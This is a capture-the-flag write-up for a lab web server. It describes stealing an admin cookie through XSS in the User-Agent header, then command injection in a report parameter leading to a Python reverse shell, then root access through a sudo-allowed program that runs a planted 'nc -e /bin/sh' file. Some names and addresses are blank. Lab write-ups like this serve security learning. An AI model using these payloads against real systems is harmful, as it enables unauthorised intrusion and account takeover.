User flag
Port scanning:
Directory scanning:
Server open a port (5000) for running a website. After scanning directories, I found 2 interesting directories :
- /support which we can access by
For questions
button. It has a form to submit a message. By checking its request, I find that it is usingPOST
method to send data to the server. I try to send a message with a payload<h1>alert(1)</h1>
and it responses a alert form which includes header of this request. Additionally, I decodeis_admin
cookie and get a string which have first part isuser
and second part is a unreadable string.
- /dashoard which is only for authenticated account.
Notice that the form print the header of request, so I try to change the header User-Agent to XSS payload and it works.
After that, I set up a listener and send a payload to get the cookie.
I got the is_admin
Replace the cookie with the one I got, I can access the dashboard page.
Use Generate report
button, the web will send a request with a parameter data
equal the date we choose. I try to change it to a linux command and it works. Then, I use reverse shell payload to get shell.
;export RHOST="";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")';
Get shell and user flag.
Root flag
Run sudo -l
command, I see that I can run sudo /usr/bin/syscheck
as root without password.
Command syscheck
is looking for the
program to execute. When syscheck
is run as root, it will execute
as root.
Create a file
with reverse shell payload and make it executable.
nc -e '/bin/sh' 7878
Run syscheck
and get root shell.